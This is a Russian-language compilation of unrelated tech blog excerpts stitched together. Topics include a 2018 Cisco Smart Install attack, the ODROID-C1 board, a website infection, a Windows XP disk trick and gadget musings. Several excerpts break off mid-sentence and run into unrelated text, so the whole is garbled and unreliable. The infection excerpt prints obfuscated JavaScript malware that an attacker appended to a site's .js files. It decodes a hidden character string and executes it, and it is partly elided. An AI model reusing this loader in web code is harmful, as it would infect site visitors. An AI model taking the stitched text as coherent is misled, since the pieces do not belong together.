В пятницу 6 апреля 2018 началась мощная атака на оборудование Cisco.

Много пишут о том, что главная причина, по которой эта атака успешна, это открытые во внешние сети сервисные порты Cisco Smart Install.

Эти порты открыты по умолчанию. А люди в массе своей оставляют то, что сконфигурировано/выбрано/настроено таким, каким оно было по умолчанию. Как видим, на примере этого случая, это касается не только домашних роутеров, но и серьёзного оборудования в крупных компаниях, где цена ошибки значительно выше.

При создании системы вы не имеете права расчитывать на то, что значения по умолчанию, которые следует изменить будут изменены, причём в нужную сторону.

Вы лишь можете заставить изменить эти значения с помощью каких либо ограничивающих использование приёмов. Чему многие будут не рады. «Защита от дурака» это один из примеров этих обязывающих ограничений.


Я хочу обратить внимание на корень самой уязвимости. В отчёте есть такая часть:

Корейские ребята из компании Жёсткоеядрышко (Hardkernel) выпустили в жизнь свой новый микрокомпьютер ODROID-C1, который сделан по подобию Raspberry Pi B+ в том же формфакторе и с тем же разъёмом GPIO. При этом, он обладает четырёхядерным процессором Cortex-A5 с частотой 1,5GHz, 1GB DDR3, гигабитной сетевой картой и прочими прелестями, которые заметно превосходят возможности малинки.

Немного предыстории

Ещё до этого Hardkernel выпустила ODROID-W, который имел тот же процессор от Broadcom, что и малинка, был программно совместим, а главным отличием были значительно меньшие размеры платы, особенно в высоту. Но ребятам, которые пекут малиновые пироги, это не понравилось и Broadcom запретила продавать Hardkernel свои процессоры. Была выпущена только одна партия ODROID-W. Её анонсировали в июле, а уже в сентябре появилось сообщение об отказе Broadcom в поставках.

Теперь же, Raspberry Pi B+ получил серьёзного конкурента, и хотя корейский вариант и менее известен, но он хорошо подходит тем, кому, как минимум, нужно больше производительности.

Эта информация относится к любому типу носителя, не только SSD, просто его я беру для примера, так как у него относительно высокая стоимость хранения информации.



Возможно, вы уже знаете, что Google Chrome хранит свои предыдущие версии у вас на диске. Как вы думаете, сколько именно версий он хранит?

У вас есть возможность принять участие в двух опросах и сравнить ваши ожидания и реальность.

Однажды, я получил письмо от Яндекс.Вебмастер о том, что один из моих сайтов заражён — Сайт содержит код, который может быть опасен для посетителей и, что В настоящий момент сайт выводится в результатах поиска с пометкой «Этот сайт может угрожать безопасности вашего компьютера».

Быстрый анализ показал, что заражены файлы *.js — в конце каждого из них был добавлен код:

try{q=document.createElement("d"+"i"+"v");q.appendChild(q+"");}catch(qw){h=-012/5;}try{prototype;}catch(brebr){st=String;zz='al';zz='zv'.substr(123-122)+zz;ss=[];f='fr'+'om'+'Ch';f+='arC';f+='ode';w=this;e=w[f["substr"](11)+zz];n="19$50$57.5$54
.... тут ещё много таких же надписей ....
$19.5$28.5"[((e)?"s":"")+"p"+"lit"]("a$"[((e)?"su":"")+"bstr"](1));for(i=6-2-1-2-1;i-685!=0;i++){j=i;if(st)ss=ss+st.fromCharCode(-1*h*(1+1*n[j]));}q=ss;e(q);}

Проанализировав выдачу поисковика на тему поиска и замены текста в файлах linux, я получил несколько вариантов команд для консоли.

Далее, я зашёл в систему по SSH и от имени root выполнил команду

Сейчас в очевидных лидерах на рынке планшетов находится Apple. И судя по желаниям американцев и тому, что я слышу лично, чтобы серьёзно потеснить Apple нужно сильно постараться.

Кому имеет смысл это делать? Тому, кто единолично контролирует рынок своих планшетов. Именно в такой ситуации можно получить полную отдачу от приведённого способа, такую, как сейчас имеет Apple с iPad. Какой это путь и почему он не подходит для производителей планшетов на Android

Когда компьютер со всем набором программ в автозагрузке стал грузится 4 минуты я подумал о том, чтобы всё это ускорить.
У меня стояла Windows XP и расширение Астер, которое позволяет работать за компьютером вдвоём, поэтому часть программ и сервисов грузилась в двойном экземпляре.

Однажды у меня появился третий винчестер и стало хватать места, чтобы перераспределить разделы на винчестерах в более удобный вариант и я решил, что можно подготовить 3 первых раздела на разных винчестерах и раскидать по ним системные папки.

Метод ускорения для Windows XP при наличии трёх винчестеров:

1. Переносим папки «Documents and Settings» и «Program Files» на первые разделы других винчестеров. Таким образом, на загрузочном диске из основных папок у нас остаётся только папка «Windows»
2. Создаём на диске с «Windows» ссылки файловой системы (junction-link) на перенесённые папки. Подробнее будет ниже.

Получается, что папки «Windows», «Documents and Settings» и «Program Files» находятся на разных винчестерах.

Изменяется ли ваше эмоциональное состояние, если вы не можете найти то, что вам нужно?
Я предполагаю, что обычно люди начинают проявлять нервозность и характерные для неё торопливость и резкость, их запросы меняются и…

Эта идея зрела давно и окончательно оформилась, когда мне показали цитату с баша, с которой и началась эта статья:

Основная идея — это дать возможность операторам тех.поддержки оставлять пользователю оценку.
Это раскрывает широкие возможности по оптимизации работы и ускорению обслуживания обращений.

Многие среди нас являются тех.специалистами и готовы быстро и чётко сформулировать вопрос или сообщить об ошибке в деталях. Но чаще всего мы вынуждены проходить все этапы обращения в службу поддержки.

Мы все привыкли к тому, что многие компании просят оценить работу специалистов тех.поддержки после окончания разговора. Но, что если оператор тоже будет ставить оценку? Давайте оставим пока в стороне компетенцию самих операторов и посмотрим, какие возможности несёт система, которая это позволяет.

Гироскоп

Гироскоп в iPhone 4 принесёт новую революцию. На мой взгляд, это самое важное из того, что в нём есть. Остальные моменты не столь интересны. Они так или иначе уже давно есть в других смартах. А отличный корпус и экран это очень приятно, но не открытие.

Окно в другой мир

Представьте себе, вы запускаете приложение на смартфоне и его экран становится для вас окном в другой мир.

Например это 3D игра.
Вы просто перемещаете смартфон для того, чтобы увидеть другие стороны того света. Вы поднимаете его вверх и видите небо. Опускаете внизу и видите землю. Вертите по сторонам, чтобы осмотреться.

 

Продолжение статьи Очевидные изобретения, которых все ждут и предварительные данные о Notion Ink Adam.

Каждый из нас вероятно заглядывает в будущее и видит там, то, чего ему сейчас не хватает. И иногда не понимает, почему то, что давно можно было бы сделать и продавать, до сих пор не сделано.

Некоторые примеры:

• Нетбук
• iPhone
• Планшеты, смартбуки, MID
• Девайс с картинки

Про нетбуки

Я мечтал о лёгком и маленьком ноутбуке очень давно. Наверное года с 2000-го. Ещё до этого, я прочёл о Toshiba Libretto в Компьютерре. Подробнее именно о нём можно почитать на хабре: Как раньше ноутбуки делали — Toshiba Libretto 50ct (1997 г.в.)
И всё думал, ну почему же никто не выпустит маленький и недорогой ноутбук со слабеньким процессором, но чтобы долго работал.
Я думал, чего же Интел не сделает Pentium I 600-1000 MHz, ведь это наверняка будет маленькое ядро и низкое энергопотребление. Это всё должно быть не дорого, ибо оно же всё из простых комплектующих.

Было у меня желание, купить себе хороший руль, но долгое время было что-то, что имело больший приоритет и руль у меня появился только сейчас и почти чудом.

Под катом, небольшой обзор Logitech Driving Force GT (за 1990 руб!)